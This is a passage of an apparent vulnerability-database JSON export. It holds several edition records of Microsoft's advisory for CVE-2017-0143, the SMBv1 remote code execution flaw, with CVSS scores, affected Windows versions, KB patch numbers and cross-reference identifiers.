8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T06:48:04", "differentElements": ["msAffectedSoftware"], "edition": 82}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-30T20:47:04", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB3210721", "KB4012606", "KB4012216", "KB3210720", "KB3177186", "KB3212646", "KB4012217", "KB4012598", "KB3205401", "KB4012212", "KB3213986", "KB3205409", "KB4012215", "KB4012213", "KB4012214", "KBMS16-110, 3187754", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T20:47:04", "differentElements": ["msAffectedSoftware"], "edition": 83}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-01T06:44:56", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3212646", "KB3210721", "KB4013429", "KB4012214", "KB4012606", "KB4013198", "KB3205401", "KB4012215", "KB3177186", "KBMS16-110, 3187754", "KB3213986", "KB3210720", "KB4012598", "KB4012212", "KB4012216", "KB4012217", "KB4012213", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T06:44:56", "differentElements": ["msAffectedSoftware"], "edition": 84}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": 